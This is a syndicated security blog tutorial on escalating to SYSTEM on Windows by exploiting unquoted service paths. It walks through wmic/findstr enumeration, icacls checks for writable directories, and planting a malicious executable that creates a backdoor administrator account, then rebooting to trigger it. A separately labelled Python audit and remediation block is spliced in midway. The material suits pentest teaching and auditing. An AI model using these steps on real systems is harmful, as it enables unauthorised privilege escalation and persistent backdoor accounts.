Windows Privilege Escalation – Unquoted Services

So, you’ve popped a user shell on a Windows box and now you’re looking to escalate those privileges. Great! In this article we’ll look at one method of elevating your privileges by exploiting unquoted service paths.

A Windows service is a program that runs in the background, similar to a *nix daemon. Often services are started automatically when Windows loads, but they can also be started manually by a user or by other software. When a Windows service is installed, a registry key for it is created under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services along with several values. One of those values, ImagePath (seen in the screenshot), specifies the location of the service executable.

In this image you can see the file path is not surrounded by quotes, which makes the service a candidate for escalating our privileges. When a Windows service is started, the CreateProcess function is used to launch the service executable. If the ImagePath value is not surrounded by quotes, CreateProcess has to work out where the executable path ends and the arguments begin, and it does so by trying each space-delimited prefix in turn. For example, if the ImagePath value contained c:\program files\sub dir\program name, the function would attempt to execute the following, in order:

c:\program.exe files\sub dir\program name
c:\program files\sub.exe dir\program name
c:\program files\sub dir\program.exe name
c:\program files\sub dir\program name.exe

If a low-privileged user can write to any of these directories, an executable placed at one of the earlier candidate paths will be picked up first and run as SYSTEM, which is how we escalate our privileges. Now that we know how to take advantage of unquoted services, let’s look at how to find them. You could simply look through the registry checking each service, but that would take some time. An easier method is to query WMI for all services and then filter the results. Start with the following command to list all services:

C:\>wmic service get name,pathname,startmode

While this lists every service’s name, path to executable, and start mode, we can go a few steps further to prune the list down to just those services that are unquoted. Let’s try the following command, using findstr to filter our results:

C:\>wmic service get name,pathname,startmode |findstr /i /v "C:\Windows\\" |findstr /i /v """
Name          PathName                                                                   StartMode
VulnService   C:\Program Files (x86)\Vuln Service\Vuln Service Bin\VulnService.exe      Auto

We pipe the wmic output into findstr, using the /i option to make the search case-insensitive and the /v option to print only lines that do not contain a match. This filters out all the Windows services and any service whose path contains quotes, leaving only the unquoted services. Lucky for us, we found a service named VulnService whose path is not quoted and whose StartMode is set to Auto. This means that, if we have the appropriate permissions, we can place a malicious executable at any of the following locations and it will be executed with SYSTEM privileges the next time the service is started.

C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\Vuln.exe
C:\Program Files (x86)\Vuln Service\Vuln.exe
C:\Program Files (x86)\Vuln Service\Vuln Service.exe
C:\Program Files (x86)\Vuln Service\Vuln Service Bin\VulnService.exe
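Here is an added Python example (not the post’s or the author’s code) that implements the CreateProcess search order and the wmic | findstr filter above as an audit check over exported service records, and also produces the fix, the quoted ImagePath value. The service rows are constructed; the rule that a service is only flagged when some candidate path precedes its real executable is my refinement of the post’s filter.

```python
# Constructed sample rows from `wmic service get name,pathname,startmode`
# (not from a real host); only VulnService has an exploitable unquoted path.
SAMPLE_SERVICES = [
    ("VulnService", r"C:\Program Files (x86)\Vuln Service\Vuln Service Bin\VulnService.exe", "Auto"),
    ("GoodService", r'"C:\Program Files\Good App\good.exe" -service', "Auto"),
    ("Dnscache", r"C:\Windows\system32\svchost.exe -k NetworkService", "Auto"),
    ("Agent", r"C:\Tools\agent.exe --verbose", "Manual"),
]

def _prefixes(image_path):
    """Space-delimited prefixes in the order CreateProcess tries them, each paired with the .exe it looks for."""
    tokens = image_path.split(" ")
    out = []
    for i in range(1, len(tokens) + 1):
        p = " ".join(tokens[:i])
        out.append((p, p if p.lower().endswith(".exe") else p + ".exe"))
    return out

def hijack_candidates(image_path):
    """Executables resolved *before* the intended one. Empty for quoted paths and
    when the first token already names the .exe (spaces only in the arguments)."""
    if image_path.startswith('"'):
        return []
    found = []
    for prefix, exe in _prefixes(image_path):
        if prefix.lower().endswith(".exe"):  # reached the real executable
            return found
        found.append(exe)
    return found[:-1]  # no .exe in the path at all: the last prefix is the target

def flag_unquoted_services(services):
    """The post's wmic | findstr filter (skip the Windows directory and quoted paths),
    refined so that at least one candidate must precede the real executable."""
    return {name: hijack_candidates(path) for name, path, _ in services
            if not path.lower().startswith("c:\\windows\\") and hijack_candidates(path)}

def directories_to_audit(candidates):
    """Distinct parent directories to check with icacls for (W)/(M)/(F) granted to non-admins."""
    return list(dict.fromkeys(c.rsplit("\\", 1)[0] + "\\" for c in candidates))

def quoted_image_path(image_path):
    """Remediation value for ImagePath: quote the executable, keep any arguments."""
    if image_path.startswith('"'):
        return image_path
    for prefix, _ in _prefixes(image_path):
        if prefix.lower().endswith(".exe"):
            return f'"{prefix}"' + image_path[len(prefix):]
    return f'"{image_path}"'
```

The quoted value returned by quoted_image_path is what to write back to the service, for example with `sc config <name> binPath= "..."`, after which the candidate list for that service is empty.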

To check permissions on a directory we can use the icacls tool. We’ll check each directory in the path, looking for write permissions granted to our user:

C:\>icacls "c:\"
c:\
    BUILTIN\Administrators:(F)
    BUILTIN\Administrators:(OI)(CI)(IO)(F)
    NT AUTHORITY\SYSTEM:(F)
    NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
    BUILTIN\Users:(OI)(CI)(RX)
    NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(M)
    NT AUTHORITY\Authenticated Users:(AD)
    Mandatory Label\High Mandatory Level:(OI)(NP)(IO)(NW)

C:\>icacls "C:\Program Files (x86)"
C:\Program Files (x86)
    NT SERVICE\TrustedInstaller:(F)
    NT SERVICE\TrustedInstaller:(CI)(IO)(F)
    NT AUTHORITY\SYSTEM:(M)
    NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
    BUILTIN\Administrators:(M)
    BUILTIN\Administrators:(OI)(CI)(IO)(F)
    BUILTIN\Users:(RX)
    BUILTIN\Users:(OI)(CI)(IO)(GR,GE)
    CREATOR OWNER:(OI)(CI)(IO)(F)

C:\>icacls "C:\Program Files (x86)\Vuln Service"
C:\Program Files (x86)\Vuln Service
    BUILTIN\Users:(OI)(CI)(F)
    NT SERVICE\TrustedInstaller:(I)(F)
    NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
    NT AUTHORITY\SYSTEM:(I)(F)
    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
    BUILTIN\Administrators:(I)(F)
    BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
    BUILTIN\Users:(I)(RX)
    BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
    CREATOR OWNER:(I)(OI)(CI)(IO)(F)

C:\>icacls "C:\Program Files (x86)\Vuln Service\Vuln Service Bin"
C:\Program Files (x86)\Vuln Service\Vuln Service Bin
    BUILTIN\Users:(OI)(CI)(F)
    NT SERVICE\TrustedInstaller:(I)(F)
    NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
    NT AUTHORITY\SYSTEM:(I)(F)
    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
    BUILTIN\Administrators:(I)(F)
    BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
    BUILTIN\Users:(I)(RX)
    BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
    CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Sweet! We found two directories, C:\Program Files (x86)\Vuln Service and C:\Program Files (x86)\Vuln Service\Vuln Service Bin, that grant Users full control (F). This means we can place a malicious executable at any of the following locations to exploit the unquoted service:

C:\Program Files (x86)\Vuln Service\Vuln.exe
C:\Program Files (x86)\Vuln Service\Vuln Service.exe
C:\Program Files (x86)\Vuln Service\Vuln Service Bin\VulnService.exe

Now all we need is a malicious executable to elevate our permissions. There are many ways to go about this; I’m choosing to write a C# program that creates a new administrator account named 1up with the password secret. Let’s get started writing our C# code.

View C# Source Code Here

Now compile the code using Visual Studio Community and place the executable at any of the target locations we found with write permissions. Once the malicious executable is in place, the final task is to restart the service so that our exe runs. You’ll likely find you don’t have the permissions needed to restart the service. Since the service’s StartMode is Auto, we can simply wait until the system reboots, or reboot it ourselves with:

shutdown -r

If all goes well, when Windows reboots it will start our malicious executable, creating a new administrator user that we can use to elevate our permissions, which completes our hack.

Check out the YouTube video

Happy Hacking!


*** This is a Security Bloggers Network syndicated blog from The Ethical Hacker Network authored by HackHappy. Read the original post at: http://feedproxy.google.com/~r/eh-net/~3/ZL9N1nyb62M/